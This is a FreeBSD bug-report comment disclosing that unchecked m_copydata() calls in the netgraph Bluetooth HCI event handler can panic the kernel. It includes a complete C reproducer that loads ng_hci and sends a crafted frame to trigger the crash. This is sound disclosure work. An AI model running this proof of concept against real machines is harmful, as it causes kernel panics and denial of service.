[Bug 267294] inquiry_result() in ng_hci_event.c ought to check before calling m_copydata()
Date: Wed, 26 Oct 2022 21:28:58 UTC
https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=267294
--- Comment #1 from Robert Morris <rtm@lcs.mit.edu> ---
The m_copydata() calls in num_compl_pkts() in ng_hci_evnt.c can also
panic. Here's a demo program:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <netinet/in.h>
#include <sys/wait.h>
#include <sys/resource.h>
#include <arpa/inet.h>
#include <assert.h>
#include <ctype.h>
#include <fcntl.h>
#include <signal.h>
#include <netgraph/ng_message.h>
#include <netgraph/ng_socket.h>
#include <netgraph.h>
int
main(){
/*
 * Reproducer attached to the bug report: drives the panic described above
 * (unchecked m_copydata() in ng_hci_evnt.c) by creating an ng_hci node and
 * handing it one crafted frame. Needs privileges to kldload and to create
 * netgraph nodes; every library/system call below is left unchecked, so the
 * program simply runs to the end whether or not the setup succeeded.
 */
setlinebuf(stdout);
/* Disable core dumps for this process (soft and hard RLIMIT_CORE = 0). */
struct rlimit r;
r.rlim_cur = r.rlim_max = 0;
setrlimit(RLIMIT_CORE, &r);
signal(SIGPIPE, SIG_IGN);
/* Load the netgraph framework and the HCI node type; return values ignored. */
system("kldload netgraph");
system("kldload ng_hci");
/* cs = control socket, ds = data socket of a fresh ng_socket node. */
int cs = -1;
int ds = -1;
NgMkSockNode(NULL, &cs, &ds);
/* Attach an "hci" node: our hook "hook" <-> its "drv" hook. */
struct ngm_mkpeer mkp;
memset(&mkp, 0, sizeof(mkp));
strcpy(mkp.type, "hci");
strcpy(mkp.ourhook, "hook");
strcpy(mkp.peerhook, "drv");
if (NgSendMsg(cs, ".:", NGM_GENERIC_COOKIE,
NGM_MKPEER, &mkp, sizeof(mkp)) < 0) {
/* Failure is only reported; the send below still happens. */
fprintf(stderr, "netgraph mkpeer %s %s failed\n", mkp.type, mkp.peerhook);
}
/*
 * Frame: 128 bytes of 0xff, first 8 bytes XORed with 0xecfb; only the first
 * 116 bytes are sent. Storing through (long long *) into a char array is
 * type punning — technically UB under strict aliasing; memcpy would be the
 * portable form.
 */
char buf[128];
memset(buf, 0xff, sizeof(buf));
*(long long *)(buf + 0) ^= 0xecfb;
NgSendData(ds, "hook", (unsigned char *)buf, 116);
/* No explicit return: falls off the end of main (returns 0 since C99). */
}